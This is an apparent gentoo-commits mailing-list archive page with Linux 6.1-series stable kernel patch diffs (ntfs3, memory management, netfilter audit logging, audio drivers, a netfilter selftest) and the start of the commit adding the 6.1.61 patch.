+ module_exit(uvesafb_exit);
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index f6a7fd47efd7a..82874be945248 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -709,8 +709,8 @@ int ceph_wait_on_conflict_unlink(struct dentry *dentry)
+ 		if (!d_same_name(udentry, pdentry, &dname))
+ 			goto next;
+ 
++		found = dget_dlock(udentry);
+ 		spin_unlock(&udentry->d_lock);
+-		found = dget(udentry);
+ 		break;
+ next:
+ 		spin_unlock(&udentry->d_lock);
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 63169529b52c4..2215179c925b3 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -1658,10 +1658,8 @@ repack:
+ 			le_b = NULL;
+ 			attr_b = ni_find_attr(ni, NULL, &le_b, ATTR_DATA, NULL,
+ 					      0, NULL, &mi_b);
+-			if (!attr_b) {
+-				err = -ENOENT;
+-				goto out;
+-			}
++			if (!attr_b)
++				return -ENOENT;
+ 
+ 			attr = attr_b;
+ 			le = le_b;
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index 81c22df27c725..0c6a68e71e7d4 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -52,7 +52,8 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 
+ 	if (!attr->non_res) {
+ 		lsize = le32_to_cpu(attr->res.data_size);
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
++		/* attr is resident: lsize < record_size (1K or 4K) */
++		le = kvmalloc(al_aligned(lsize), GFP_KERNEL);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
+@@ -80,7 +81,17 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 		if (err < 0)
+ 			goto out;
+ 
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
++		/* attr is nonresident.
++		 * The worst case:
++		 * 1T (2^40) extremely fragmented file.
++		 * cluster = 4K (2^12) => 2^28 fragments
++		 * 2^9 fragments per one record => 2^19 records
++		 * 2^5 bytes of ATTR_LIST_ENTRY per one record => 2^24 bytes.
++		 *
++		 * the result is 16M bytes per attribute list.
++		 * Use kvmalloc to allocate in range [several Kbytes - dozen Mbytes]
++		 */
++		le = kvmalloc(al_aligned(lsize), GFP_KERNEL);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index e0cdc91d88a85..c055bbdfe0f7c 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -662,7 +662,8 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 		wnd->bits_last = wbits;
+ 
+ 	wnd->free_bits =
+-		kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
++		kvmalloc_array(wnd->nwnd, sizeof(u16), GFP_KERNEL | __GFP_ZERO);
++
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index fb438d6040409..d4d9f4ffb6d9a 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -309,7 +309,11 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 		return 0;
+ 	}
+ 
+-	dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
++	/* NTFS: symlinks are "dir + reparse" or "file + reparse" */
++	if (fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT)
++		dt_type = DT_LNK;
++	else
++		dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
+ 
+ 	return !dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
+ }
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index dda13e1f1b330..bb7e33c240737 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -2149,7 +2149,7 @@ out1:
+ 
+ 	for (i = 0; i < pages_per_frame; i++) {
+ 		pg = pages[i];
+-		if (i == idx)
++		if (i == idx || !pg)
+ 			continue;
+ 		unlock_page(pg);
+ 		put_page(pg);
+@@ -3198,6 +3198,12 @@ static bool ni_update_parent(struct ntfs_inode *ni, struct NTFS_DUP_INFO *dup,
+ 		if (!fname || !memcmp(&fname->dup, dup, sizeof(fname->dup)))
+ 			continue;
+ 
++		/* Check simple case when parent inode equals current inode. */
++		if (ino_get(&fname->home) == ni->vfs_inode.i_ino) {
++			ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
++			continue;
++		}
++
+ 		/* ntfs_iget5 may sleep. */
+ 		dir = ntfs_iget5(sb, &fname->home, NULL);
+ 		if (IS_ERR(dir)) {
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 00faf41d8f97d..710cb5aa5a65b 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2169,8 +2169,10 @@ file_is_valid:
+ 
+ 			if (!page) {
+ 				page = kmalloc(log->page_size, GFP_NOFS);
+-				if (!page)
+-					return -ENOMEM;
++				if (!page) {
++					err = -ENOMEM;
++					goto out;
++				}
+ 			}
+ 
+ 			/*
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 9c0fc3a29d0c9..873b1434a9989 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -953,18 +953,11 @@ out:
+ 	if (err)
+ 		return err;
+ 
+-	mark_inode_dirty(&ni->vfs_inode);
++	mark_inode_dirty_sync(&ni->vfs_inode);
+ 	/* verify(!ntfs_update_mftmirr()); */
+ 
+-	/*
+-	 * If we used wait=1, sync_inode_metadata waits for the io for the
+-	 * inode to finish. It hangs when media is removed.
+-	 * So wait=0 is sent down to sync_inode_metadata
+-	 * and filemap_fdatawrite is used for the data blocks.
+-	 */
+-	err = sync_inode_metadata(&ni->vfs_inode, 0);
+-	if (!err)
+-		err = filemap_fdatawrite(ni->vfs_inode.i_mapping);
++	/* write mft record on disk. */
++	err = _ni_write_inode(&ni->vfs_inode, 1);
+ 
+ 	return err;
+ }
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 8e2fe0f69203b..6066eea3f61cb 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -1141,7 +1141,7 @@ static int ntfs_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		goto put_inode_out;
+ 	}
+ 	bytes = inode->i_size;
+-	sbi->def_table = t = kmalloc(bytes, GFP_NOFS | __GFP_NOWARN);
++	sbi->def_table = t = kvmalloc(bytes, GFP_KERNEL);
+ 	if (!t) {
+ 		err = -ENOMEM;
+ 		goto put_inode_out;
+diff --git a/include/drm/gpu_scheduler.h b/include/drm/gpu_scheduler.h
+index 2ae4fd62e01c4..17e7e3145a058 100644
+--- a/include/drm/gpu_scheduler.h
++++ b/include/drm/gpu_scheduler.h
+@@ -55,8 +55,7 @@ enum drm_sched_priority {
+ 	DRM_SCHED_PRIORITY_HIGH,
+ 	DRM_SCHED_PRIORITY_KERNEL,
+ 
+-	DRM_SCHED_PRIORITY_COUNT,
+-	DRM_SCHED_PRIORITY_UNSET = -2
++	DRM_SCHED_PRIORITY_COUNT
+ };
+ 
+ /**
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 95f33dadb2be2..b76ff08506181 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -568,6 +568,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F3 0x14e3
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F3 0x14f3
+ #define PCI_DEVICE_ID_AMD_19H_M78H_DF_F3 0x12fb
++#define PCI_DEVICE_ID_AMD_VANGOGH_USB	0x163a
+ #define PCI_DEVICE_ID_AMD_CNB17H_F3	0x1703
+ #define PCI_DEVICE_ID_AMD_LANCE		0x2000
+ #define PCI_DEVICE_ID_AMD_LANCE_HOME	0x2001
+diff --git a/include/linux/power_supply.h b/include/linux/power_supply.h
+index aa2c4a7c4826d..a10428884e6a5 100644
+--- a/include/linux/power_supply.h
++++ b/include/linux/power_supply.h
+@@ -766,7 +766,7 @@ struct power_supply_battery_info {
+ 	int bti_resistance_tolerance;
+ };
+ 
+-extern struct atomic_notifier_head power_supply_notifier;
++extern struct blocking_notifier_head power_supply_notifier;
+ extern int power_supply_reg_notifier(struct notifier_block *nb);
+ extern void power_supply_unreg_notifier(struct notifier_block *nb);
+ #if IS_ENABLED(CONFIG_POWER_SUPPLY)
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index 0218fae12eddc..0133db648d8e9 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -326,7 +326,7 @@ static int kiocb_done(struct io_kiocb *req, ssize_t ret,
+ 	struct io_rw *rw = io_kiocb_to_cmd(req, struct io_rw);
+ 	unsigned final_ret = io_fixup_rw_res(req, ret);
+ 
+-	if (req->flags & REQ_F_CUR_POS)
++	if (ret >= 0 && req->flags & REQ_F_CUR_POS)
+ 		req->file->f_pos = rw->kiocb.ki_pos;
+ 	if (ret >= 0 && (rw->kiocb.ki_complete == io_complete_rw)) {
+ 		if (!__io_complete_rw_common(req, ret)) {
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index bfe2d1d50fbee..84e11c2caae42 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -1525,8 +1525,10 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		/*
+ 		 * Only update home node if there is an existing vma policy
+ 		 */
+-		if (!new)
++		if (!new) {
++			prev = vma;
+ 			continue;
++		}
+ 
+ 		/*
+ 		 * If any vma in the range got policy other than MPOL_BIND
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 8ffe3f87f7ba9..c0f9575493deb 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -519,6 +519,7 @@ inline int vma_expand(struct ma_state *mas, struct vm_area_struct *vma,
+ 	struct anon_vma *anon_vma = vma->anon_vma;
+ 	struct file *file = vma->vm_file;
+ 	bool remove_next = false;
++	struct vm_area_struct *anon_dup = NULL;
+ 
+ 	if (next && (vma != next) && (end == next->vm_end)) {
+ 		remove_next = true;
+@@ -530,6 +531,8 @@ inline int vma_expand(struct ma_state *mas, struct vm_area_struct *vma,
+ 			error = anon_vma_clone(vma, next);
+ 			if (error)
+ 				return error;
++
++			anon_dup = vma;
+ 		}
+ 	}
+ 
+@@ -602,6 +605,9 @@ inline int vma_expand(struct ma_state *mas, struct vm_area_struct *vma,
+ 	return 0;
+ 
+ nomem:
++	if (anon_dup)
++		unlink_anon_vmas(anon_dup);
++
+ 	return -ENOMEM;
+ }
+ 
+@@ -629,6 +635,7 @@ int __vma_adjust(struct vm_area_struct *vma, unsigned long start,
+ 	int remove_next = 0;
+ 	MA_STATE(mas, &mm->mm_mt, 0, 0);
+ 	struct vm_area_struct *exporter = NULL, *importer = NULL;
++	struct vm_area_struct *anon_dup = NULL;
+ 
+ 	if (next && !insert) {
+ 		if (end >= next->vm_end) {
+@@ -709,11 +716,17 @@ int __vma_adjust(struct vm_area_struct *vma, unsigned long start,
+ 			error = anon_vma_clone(importer, exporter);
+ 			if (error)
+ 				return error;
++
++			anon_dup = importer;
+ 		}
+ 	}
+ 
+-	if (mas_preallocate(&mas, vma, GFP_KERNEL))
++	if (mas_preallocate(&mas, vma, GFP_KERNEL)) {
++		if (anon_dup)
++			unlink_anon_vmas(anon_dup);
++
+ 		return -ENOMEM;
++	}
+ 
+ 	vma_adjust_trans_huge(orig_vma, start, end, adjust_next);
+ 	if (file) {
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 5e3dbe2652dbd..5c783199b4999 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7324,6 +7324,16 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
++static void audit_log_obj_reset(const struct nft_table *table,
++				unsigned int base_seq, unsigned int nentries)
++{
++	char *buf = kasprintf(GFP_ATOMIC, "%s:%u", table->name, base_seq);
++
++	audit_log_nfcfg(buf, table->family, nentries,
++			AUDIT_NFT_OP_OBJ_RESET, GFP_ATOMIC);
++	kfree(buf);
++}
++
+ struct nft_obj_filter {
+ 	char		*table;
+ 	u32		type;
+@@ -7338,8 +7348,10 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 	struct net *net = sock_net(skb->sk);
+ 	int family = nfmsg->nfgen_family;
+ 	struct nftables_pernet *nft_net;
++	unsigned int entries = 0;
+ 	struct nft_object *obj;
+ 	bool reset = false;
++	int rc = 0;
+ 
+ 	if (NFNL_MSG_TYPE(cb->nlh->nlmsg_type) == NFT_MSG_GETOBJ_RESET)
+ 		reset = true;
+@@ -7352,6 +7364,7 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 		if (family != NFPROTO_UNSPEC && family != table->family)
+ 			continue;
+ 
++		entries = 0;
+ 		list_for_each_entry_rcu(obj, &table->objects, list) {
+ 			if (!nft_is_active(net, obj))
+ 				goto cont;
+@@ -7367,34 +7380,27 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 			    filter->type != NFT_OBJECT_UNSPEC &&
+ 			    obj->ops->type->type != filter->type)
+ 				goto cont;
+-			if (reset) {
+-				char *buf = kasprintf(GFP_ATOMIC,
+-						      "%s:%u",
+-						      table->name,
+-						      nft_net->base_seq);
+-
+-				audit_log_nfcfg(buf,
+-						family,
+-						obj->handle,
+-						AUDIT_NFT_OP_OBJ_RESET,
+-						GFP_ATOMIC);
+-				kfree(buf);
+-			}
+ 
+-			if (nf_tables_fill_obj_info(skb, net, NETLINK_CB(cb->skb).portid,
+-						    cb->nlh->nlmsg_seq,
+-						    NFT_MSG_NEWOBJ,
+-						    NLM_F_MULTI | NLM_F_APPEND,
+-						    table->family, table,
+-						    obj, reset) < 0)
+-				goto done;
++			rc = nf_tables_fill_obj_info(skb, net,
++						     NETLINK_CB(cb->skb).portid,
++						     cb->nlh->nlmsg_seq,
++						     NFT_MSG_NEWOBJ,
++						     NLM_F_MULTI | NLM_F_APPEND,
++						     table->family, table,
++						     obj, reset);
++			if (rc < 0)
++				break;
+ 
++			entries++;
+ 			nl_dump_check_consistent(cb, nlmsg_hdr(skb));
+ cont:
+ 			idx++;
+ 		}
++		if (reset && entries)
++			audit_log_obj_reset(table, nft_net->base_seq, entries);
++		if (rc < 0)
++			break;
+ 	}
+-done:
+ 	rcu_read_unlock();
+ 
+ 	cb->args[0] = idx;
+@@ -7499,7 +7505,7 @@ static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 		audit_log_nfcfg(buf,
+ 				family,
+-				obj->handle,
++				1,
+ 				AUDIT_NFT_OP_OBJ_RESET,
+ 				GFP_ATOMIC);
+ 		kfree(buf);
+diff --git a/net/netfilter/nfnetlink_log.c b/net/netfilter/nfnetlink_log.c
+index d97eb280cb2e8..c5ff699e30469 100644
+--- a/net/netfilter/nfnetlink_log.c
++++ b/net/netfilter/nfnetlink_log.c
+@@ -690,8 +690,8 @@ nfulnl_log_packet(struct net *net,
+ 	unsigned int plen = 0;
+ 	struct nfnl_log_net *log = nfnl_log_pernet(net);
+ 	const struct nfnl_ct_hook *nfnl_ct = NULL;
++	enum ip_conntrack_info ctinfo = 0;
+ 	struct nf_conn *ct = NULL;
+-	enum ip_conntrack_info ctinfo;
+ 
+ 	if (li_user && li_user->type == NF_LOG_TYPE_ULOG)
+ 		li = li_user;
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index ba93e2a6bdbb4..04448bfb4d3db 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -364,7 +364,7 @@ static int u32_init(struct tcf_proto *tp)
+ 	idr_init(&root_ht->handle_idr);
+ 
+ 	if (tp_c == NULL) {
+-		tp_c = kzalloc(struct_size(tp_c, hlist->ht, 1), GFP_KERNEL);
++		tp_c = kzalloc(sizeof(*tp_c), GFP_KERNEL);
+ 		if (tp_c == NULL) {
+ 			kfree(root_ht);
+ 			return -ENOBUFS;
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index 2873420c9aca8..bc03b5692983c 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -343,6 +343,12 @@ static const struct config_entry config_table[] = {
+ 					DMI_MATCH(DMI_SYS_VENDOR, "Google"),
+ 				}
+ 			},
++			{
++				.ident = "Google firmware",
++				.matches = {
++					DMI_MATCH(DMI_BIOS_VERSION, "Google"),
++				}
++			},
+ 			{}
+ 		}
+ 	},
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index 620ecbfa4a7a8..f86fc7cd104d4 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3251,6 +3251,8 @@ int rt5645_set_jack_detect(struct snd_soc_component *component,
+ 				RT5645_GP1_PIN_IRQ, RT5645_GP1_PIN_IRQ);
+ 		regmap_update_bits(rt5645->regmap, RT5645_GEN_CTRL1,
+ 				RT5645_DIG_GATE_CTRL, RT5645_DIG_GATE_CTRL);
++		regmap_update_bits(rt5645->regmap, RT5645_DEPOP_M1,
++				RT5645_HP_CB_MASK, RT5645_HP_CB_PU);
+ 	}
+ 	rt5645_irq(0, rt5645);
+ 
+diff --git a/sound/soc/codecs/tas2780.c b/sound/soc/codecs/tas2780.c
+index afdf0c863aa10..a2d27410bbefa 100644
+--- a/sound/soc/codecs/tas2780.c
++++ b/sound/soc/codecs/tas2780.c
+@@ -39,7 +39,7 @@ static void tas2780_reset(struct tas2780_priv *tas2780)
+ 		usleep_range(2000, 2050);
+ 	}
+ 
+-	snd_soc_component_write(tas2780->component, TAS2780_SW_RST,
++	ret = snd_soc_component_write(tas2780->component, TAS2780_SW_RST,
+ 				TAS2780_RST);
+ 	if (ret)
+ 		dev_err(tas2780->dev, "%s:errCode:0x%x Reset error!\n",
+diff --git a/sound/soc/codecs/tlv320adc3xxx.c b/sound/soc/codecs/tlv320adc3xxx.c
+index 52bb557247244..6bd6da01aafac 100644
+--- a/sound/soc/codecs/tlv320adc3xxx.c
++++ b/sound/soc/codecs/tlv320adc3xxx.c
+@@ -293,7 +293,7 @@
+ #define ADC3XXX_BYPASS_RPGA		0x80
+ 
+ /* MICBIAS control bits */
+-#define ADC3XXX_MICBIAS_MASK		0x2
++#define ADC3XXX_MICBIAS_MASK		0x3
+ #define ADC3XXX_MICBIAS1_SHIFT		5
+ #define ADC3XXX_MICBIAS2_SHIFT		3
+ 
+@@ -1099,7 +1099,7 @@ static int adc3xxx_parse_dt_micbias(struct adc3xxx *adc3xxx,
+ 	unsigned int val;
+ 
+ 	if (!of_property_read_u32(np, propname, &val)) {
+-		if (val >= ADC3XXX_MICBIAS_AVDD) {
++		if (val > ADC3XXX_MICBIAS_AVDD) {
+ 			dev_err(dev, "Invalid property value for '%s'\n", propname);
+ 			return -EINVAL;
+ 		}
+diff --git a/sound/soc/generic/simple-card.c b/sound/soc/generic/simple-card.c
+index fbb682747f598..a8bc4e45816df 100644
+--- a/sound/soc/generic/simple-card.c
++++ b/sound/soc/generic/simple-card.c
+@@ -678,10 +678,12 @@ static int asoc_simple_probe(struct platform_device *pdev)
+ 		struct snd_soc_dai_link *dai_link = priv->dai_link;
+ 		struct simple_dai_props *dai_props = priv->dai_props;
+ 
++		ret = -EINVAL;
++
+ 		cinfo = dev->platform_data;
+ 		if (!cinfo) {
+ 			dev_err(dev, "no info for asoc-simple-card\n");
+-			return -EINVAL;
++			goto err;
+ 		}
+ 
+ 		if (!cinfo->name ||
+@@ -690,7 +692,7 @@ static int asoc_simple_probe(struct platform_device *pdev)
+ 		    !cinfo->platform ||
+ 		    !cinfo->cpu_dai.name) {
+ 			dev_err(dev, "insufficient asoc_simple_card_info settings\n");
+-			return -EINVAL;
++			goto err;
+ 		}
+ 
+ 		cpus			= dai_link->cpus;
+diff --git a/sound/soc/sof/sof-pci-dev.c b/sound/soc/sof/sof-pci-dev.c
+index 643fd1036d60b..05fb4e20e8a40 100644
+--- a/sound/soc/sof/sof-pci-dev.c
++++ b/sound/soc/sof/sof-pci-dev.c
+@@ -141,6 +141,13 @@ static const struct dmi_system_id community_key_platforms[] = {
+ 			DMI_MATCH(DMI_PRODUCT_FAMILY, "Google"),
+ 		}
+ 	},
++	{
++		.ident = "Google firmware",
++		.callback = chromebook_use_community_key,
++		.matches = {
++			DMI_MATCH(DMI_BIOS_VERSION, "Google"),
++		}
++	},
+ 	{},
+ };
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 6129a62316422..f458328f9ec42 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2218,6 +2218,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2ab6, /* T+A devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x2afd, /* McIntosh Laboratory, Inc. */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2d87, /* Cayin device */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3336, /* HEM devices */
+diff --git a/tools/perf/util/evlist.c b/tools/perf/util/evlist.c
+index 6612b00949e70..ca08e6dc8b232 100644
+--- a/tools/perf/util/evlist.c
++++ b/tools/perf/util/evlist.c
+@@ -252,6 +252,9 @@ static struct evsel *evlist__dummy_event(struct evlist *evlist)
+ 		.type	= PERF_TYPE_SOFTWARE,
+ 		.config = PERF_COUNT_SW_DUMMY,
+ 		.size	= sizeof(attr), /* to capture ABI version */
++		/* Avoid frequency mode for dummy events to avoid associated timers. */
++		.freq = 0,
++		.sample_period = 1,
+ 	};
+ 
+ 	return evsel__new_idx(&attr, evlist->core.nr_entries);
+@@ -278,8 +281,6 @@ struct evsel *evlist__add_aux_dummy(struct evlist *evlist, bool system_wide)
+ 	evsel->core.attr.exclude_kernel = 1;
+ 	evsel->core.attr.exclude_guest = 1;
+ 	evsel->core.attr.exclude_hv = 1;
+-	evsel->core.attr.freq = 0;
+-	evsel->core.attr.sample_period = 1;
+ 	evsel->core.system_wide = system_wide;
+ 	evsel->no_aux_samples = true;
+ 	evsel->name = strdup("dummy:u");
+diff --git a/tools/testing/selftests/netfilter/nft_audit.sh b/tools/testing/selftests/netfilter/nft_audit.sh
+index 5267c88496d51..99ed5bd6e8402 100755
+--- a/tools/testing/selftests/netfilter/nft_audit.sh
++++ b/tools/testing/selftests/netfilter/nft_audit.sh
+@@ -99,6 +99,12 @@ do_test 'nft add counter t1 c1' \
+ do_test 'nft add counter t2 c1; add counter t2 c2' \
+ 'table=t2 family=2 entries=2 op=nft_register_obj'
+ 
++for ((i = 3; i <= 500; i++)); do
++	echo "add counter t2 c$i"
++done >$rulefile
++do_test "nft -f $rulefile" \
++'table=t2 family=2 entries=498 op=nft_register_obj'
++
+ # adding/updating quotas
+ 
+ do_test 'nft add quota t1 q1 { 10 bytes }' \
+@@ -107,6 +113,12 @@ do_test 'nft add quota t1 q1 { 10 bytes }' \
+ do_test 'nft add quota t2 q1 { 10 bytes }; add quota t2 q2 { 10 bytes }' \
+ 'table=t2 family=2 entries=2 op=nft_register_obj'
+ 
++for ((i = 3; i <= 500; i++)); do
++	echo "add quota t2 q$i { 10 bytes }"
++done >$rulefile
++do_test "nft -f $rulefile" \
++'table=t2 family=2 entries=498 op=nft_register_obj'
++
+ # changing the quota value triggers obj update path
+ do_test 'nft add quota t1 q1 { 20 bytes }' \
+ 'table=t1 family=2 entries=1 op=nft_register_obj'
+@@ -156,6 +168,40 @@ done
+ do_test 'nft reset set t1 s' \
+ 'table=t1 family=2 entries=3 op=nft_reset_setelem'
+ 
++# resetting counters
++
++do_test 'nft reset counter t1 c1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset counters t1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset counters t2' \
++'table=t2 family=2 entries=342 op=nft_reset_obj
++table=t2 family=2 entries=158 op=nft_reset_obj'
++
++do_test 'nft reset counters' \
++'table=t1 family=2 entries=1 op=nft_reset_obj
++table=t2 family=2 entries=341 op=nft_reset_obj
++table=t2 family=2 entries=159 op=nft_reset_obj'
++
++# resetting quotas
++
++do_test 'nft reset quota t1 q1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset quotas t1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset quotas t2' \
++'table=t2 family=2 entries=315 op=nft_reset_obj
++table=t2 family=2 entries=185 op=nft_reset_obj'
++
++do_test 'nft reset quotas' \
++'table=t1 family=2 entries=1 op=nft_reset_obj
++table=t2 family=2 entries=314 op=nft_reset_obj
++table=t2 family=2 entries=186 op=nft_reset_obj'
++
+ # deleting rules
+ 
+ readarray -t handles < <(nft -a list chain t1 c1 | \


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-02 11:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-02 11:10 UTC (permalink / raw
  To: gentoo-commits

commit:     e87165447456e2d4f4675c67b3a59b9d5396dc5e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Nov  2 11:09:47 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Nov  2 11:09:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e8716544

Linux patch 6.1.61

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1060_linux-6.1.61.patch | 2922 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2926 insertions(+)

diff --git a/0000_README b/0000_README
index a3b5d2f0..78a774ef 100644
--- a/0000_README
+++ b/0000_README
@@ -283,6 +283,10 @@ Patch:  1059_linux-6.1.60.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.60
 
+Patch:  1060_linux-6.1.61.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.61
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1060_linux-6.1.61.patch b/1060_linux-6.1.61.patch
new file mode 100644
index 00000000..a25aac45
--- /dev/null
+++ b/1060_linux-6.1.61.patch
@@ -0,0 +1,2922 @@
+diff --git a/Makefile b/Makefile
+index d47edcd8888e8..635474f38aaa9 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 60
++SUBLEVEL = 61
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/omap4-l4-abe.dtsi b/arch/arm/boot/dts/omap4-l4-abe.dtsi
+index 7ae8b620515c5..59f546a278f87 100644
+--- a/arch/arm/boot/dts/omap4-l4-abe.dtsi
++++ b/arch/arm/boot/dts/omap4-l4-abe.dtsi
+@@ -109,6 +109,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49022000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP4_MCBSP1_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 17 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -142,6 +144,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49024000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP4_MCBSP2_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 22 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -175,6 +179,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49026000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP4_MCBSP3_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+diff --git a/arch/arm/boot/dts/omap4-l4.dtsi b/arch/arm/boot/dts/omap4-l4.dtsi
+index 46b8f9efd4131..3fcef3080eaec 100644
+--- a/arch/arm/boot/dts/omap4-l4.dtsi
++++ b/arch/arm/boot/dts/omap4-l4.dtsi
+@@ -2043,6 +2043,8 @@
+ 				compatible = "ti,omap4-mcbsp";
+ 				reg = <0x0 0xff>; /* L4 Interconnect */
